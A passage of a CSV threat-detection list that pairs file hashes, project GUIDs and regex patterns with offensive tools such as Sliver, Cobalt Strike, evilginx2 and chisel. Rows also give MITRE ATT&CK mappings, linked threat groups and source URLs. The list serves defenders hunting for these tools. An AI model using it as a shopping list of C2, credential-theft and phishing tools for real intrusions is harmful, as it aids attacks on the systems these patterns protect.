fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35523" "*bd346689-8ee6-40b3-858b-4ed94f08d40a*",".{0,1000}bd346689\-8ee6\-40b3\-858b\-4ed94f08d40a.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","#GUIDproject","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","35524" "*bd3e5f1a848ec10158f529073a346f56c08a18c1e4cbfa1a85714037fe1561fe*",".{0,1000}bd3e5f1a848ec10158f529073a346f56c08a18c1e4cbfa1a85714037fe1561fe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35525" "*bd402defef6c6e9f3872365b7baca15d0d1ecc928eacdcae9026f93b600c58d1*",".{0,1000}bd402defef6c6e9f3872365b7baca15d0d1ecc928eacdcae9026f93b600c58d1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - 
TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35526" "*bd43503a9105de8acb54f9dc566d68f3bb7d9b75fdb2ceb5fe939d52791bfdf5*",".{0,1000}bd43503a9105de8acb54f9dc566d68f3bb7d9b75fdb2ceb5fe939d52791bfdf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35527" "*bd4913ef724705e97369862944b14594b3e092caceb0f92c283964ec00cd08d0*",".{0,1000}bd4913ef724705e97369862944b14594b3e092caceb0f92c283964ec00cd08d0.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35528" "*bd4f617afbe887d10f2e971d98b36c62e0d0bb14a8020c16e308f2a6543ae27c*",".{0,1000}bd4f617afbe887d10f2e971d98b36c62e0d0bb14a8020c16e308f2a6543ae27c.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","35530" "*bd514bc9dda0863e30e834afcf4d5b406c228f10a980ad3f434867d5aa6ef592*",".{0,1000}bd514bc9dda0863e30e834afcf4d5b406c228f10a980ad3f434867d5aa6ef592.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35531" "*BD5220F7-E1FB-41D2-91EC-E4C50C6E9B9F*",".{0,1000}BD5220F7\-E1FB\-41D2\-91EC\-E4C50C6E9B9F.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#GUIDProject","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","35532" "*bd582dca867f580de4cea00df8dafe985f7790233de90f7e962b6e6a80dd55cf*",".{0,1000}bd582dca867f580de4cea00df8dafe985f7790233de90f7e962b6e6a80dd55cf.{0,1000}","offensive_tool_keyword","shootback","a reverse TCP tunnel let you access target behind NAT or firewall","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/aploium/shootback","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","962","234","2020-09-12T07:31:56Z","2016-04-28T15:12:36Z","35533" 
"*BD602C80-47ED-4294-B981-0119D2200DB8*",".{0,1000}BD602C80\-47ED\-4294\-B981\-0119D2200DB8.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","#GUIDproject","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","35534" "*bd61c5daaad30b420817fb1fd2f0447c3b66a1900ba69fd4cd724d1e6897ab41*",".{0,1000}bd61c5daaad30b420817fb1fd2f0447c3b66a1900ba69fd4cd724d1e6897ab41.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","35535" "*BD628EE4-F3A0-4242-BCE3-95CA21114CD7*",".{0,1000}BD628EE4\-F3A0\-4242\-BCE3\-95CA21114CD7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35536" "*bd63af36618538f67b2bf90652fb7536b40c915b307a69887df67bd5cf0400b6*",".{0,1000}bd63af36618538f67b2bf90652fb7536b40c915b307a69887df67bd5cf0400b6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35537" "*bd6bd65ef2fa8d4d1793a31b863d2245eeb1e0ac361b84594a25236e43ff4d8c*",".{0,1000}bd6bd65ef2fa8d4d1793a31b863d2245eeb1e0ac361b84594a25236e43ff4d8c.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","35538" "*bd70867a4f0b2aa9b06a7e08dff5bede3922580c26f366a0145d062b55a6b8ac*",".{0,1000}bd70867a4f0b2aa9b06a7e08dff5bede3922580c26f366a0145d062b55a6b8ac.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35542" "*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*",".{0,1000}BD745A5E\-A1E9\-4FDD\-A15B\-E9F303A625AE.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","#GUIDproject","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","35543" "*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*",".{0,1000}bd745a5e\-a1e9\-4fdd\-a15b\-e9f303a625ae.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - 
TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","#GUIDproject","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","35544" "*bd7552c78fd3f852e39b140051c4a1aa5a30a14e23eee49cfb570e19b4dbb0fa*",".{0,1000}bd7552c78fd3f852e39b140051c4a1aa5a30a14e23eee49cfb570e19b4dbb0fa.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","35545" "*bd78ea00b16797551d4f40297f42e9b1f9d912f416a115c3eb10f340246a9d54*",".{0,1000}bd78ea00b16797551d4f40297f42e9b1f9d912f416a115c3eb10f340246a9d54.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35546" "*bd852d46ed2140ee627ff0798c12d589db9687c7de1b23160fe02a5570163d54*",".{0,1000}bd852d46ed2140ee627ff0798c12d589db9687c7de1b23160fe02a5570163d54.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35549" "*bd8c697efa72709e6f0901cf7f8d570d670c8da9de6af0259ab419f2c55a17c4*",".{0,1000}bd8c697efa72709e6f0901cf7f8d570d670c8da9de6af0259ab419f2c55a17c4.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","35550" "*bd8e4d5f1c7c01c16d145b0d203c84529fcce1bc51a7e52d8c7e2041b5ab8b0e*",".{0,1000}bd8e4d5f1c7c01c16d145b0d203c84529fcce1bc51a7e52d8c7e2041b5ab8b0e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35551" "*bd976ca9268513e6cc4a58b85574f62b8a76cc92*",".{0,1000}bd976ca9268513e6cc4a58b85574f62b8a76cc92.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","35552" "*bd99cb3ea030932e00edee60aa4a03d9fdc70d031adaa389d8c6ab12982efcaa*",".{0,1000}bd99cb3ea030932e00edee60aa4a03d9fdc70d031adaa389d8c6ab12982efcaa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35553" "*bda266f1f529dabd975a6f974a732dd7d9de3db2e3c8c2322985c46dd3f3c01c*",".{0,1000}bda266f1f529dabd975a6f974a732dd7d9de3db2e3c8c2322985c46dd3f3c01c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35554" "*bda4e12386c2e02081373da1ac905a6fba42ecdb2310d06aa2dc6df8b71ef544*",".{0,1000}bda4e12386c2e02081373da1ac905a6fba42ecdb2310d06aa2dc6df8b71ef544.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35555" "*bda653b24a1896f5444b4337eaa07ee541739219ec949d30357d2cce16a99b0c*",".{0,1000}bda653b24a1896f5444b4337eaa07ee541739219ec949d30357d2cce16a99b0c.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - 
TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","35556" "*bdamele/icmpsh*",".{0,1000}bdamele\/icmpsh.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35557" "*bdb2c6169980065f48ba91647b1f19e82453dc839278badba882e50f1bbd823e*",".{0,1000}bdb2c6169980065f48ba91647b1f19e82453dc839278badba882e50f1bbd823e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35558" "*bdb5649ff5beaed52016af493e446ae628e064dc663f181141bd1b7e7b360a42*",".{0,1000}bdb5649ff5beaed52016af493e446ae628e064dc663f181141bd1b7e7b360a42.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35559" "*BDC1465EDF60B9B627B24051396694AAE3048DC5D5F7C79813C1AFA0741BBD7D*",".{0,1000}BDC1465EDF60B9B627B24051396694AAE3048DC5D5F7C79813C1AFA0741BBD7D.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","35561" 
"*bdc2686a36e42dd3811d7c05c38a29d1c8107c6fa8a94b194255857bbb80053f*",".{0,1000}bdc2686a36e42dd3811d7c05c38a29d1c8107c6fa8a94b194255857bbb80053f.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","35562" "*bdc2c691a61df0926160a728c8419244fa2a1523bf3a3c61a353afa78d80cbfe*",".{0,1000}bdc2c691a61df0926160a728c8419244fa2a1523bf3a3c61a353afa78d80cbfe.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","#filehash","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","35563" "*bdcfb9b63fd01bdd50427f205338e26e8001015b4fe14b6016cfb08e37c08a6e*",".{0,1000}bdcfb9b63fd01bdd50427f205338e26e8001015b4fe14b6016cfb08e37c08a6e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35565" "*bdcsync*",".{0,1000}bdcsync.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the 
tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35566" "*bdd26fca11a49c13b6f5a4549264172af36894eed9c2ef87ede374da202328ec*",".{0,1000}bdd26fca11a49c13b6f5a4549264172af36894eed9c2ef87ede374da202328ec.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","35567" "*bdd8493bc9a1be6b5018c949bd3fc60831b83e0c97ff31933a0e9516a25947a2*",".{0,1000}bdd8493bc9a1be6b5018c949bd3fc60831b83e0c97ff31933a0e9516a25947a2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","35568" "*bdde4cad60ba279c32c416cee47783f8fbbc7723cc2ab5dbed096ced5d88c6a6*",".{0,1000}bdde4cad60ba279c32c416cee47783f8fbbc7723cc2ab5dbed096ced5d88c6a6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35569" "*bddfbb42571d9ec3398d559fb93330e60a84cfaf737a00545767a384917a01df*",".{0,1000}bddfbb42571d9ec3398d559fb93330e60a84cfaf737a00545767a384917a01df.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35570" 
"*bde38d20d4eb1a86cc38a81cc92861b3d366210af570ecb6fea93ac1060eaa7d*",".{0,1000}bde38d20d4eb1a86cc38a81cc92861b3d366210af570ecb6fea93ac1060eaa7d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35571" "*BDED2735-F9E4-4B2E-9636-4EEDD78FC720*",".{0,1000}BDED2735\-F9E4\-4B2E\-9636\-4EEDD78FC720.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","35574" "*bdf481e2b241169231c72a3f811c69f97526db060e11c2e7e7c1e39dadf4ac89*",".{0,1000}bdf481e2b241169231c72a3f811c69f97526db060e11c2e7e7c1e39dadf4ac89.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","35575" 
"*bdf7dee28fc21a09ae10d5e3a75e3a7713e705e78a40f55a4c003c9358174372*",".{0,1000}bdf7dee28fc21a09ae10d5e3a75e3a7713e705e78a40f55a4c003c9358174372.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35576" "*bdf8e7a1e24bb1b99ff06801cabc7df8ab4f12684d9e349aeb6aa8c4cf891edd*",".{0,1000}bdf8e7a1e24bb1b99ff06801cabc7df8ab4f12684d9e349aeb6aa8c4cf891edd.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","35577" "*BDFEE233-3FED-42E5-AA64-492EB2AC7047*",".{0,1000}BDFEE233\-3FED\-42E5\-AA64\-492EB2AC7047.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#GUIDproject","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","35578" "*bdllinject*",".{0,1000}bdllinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 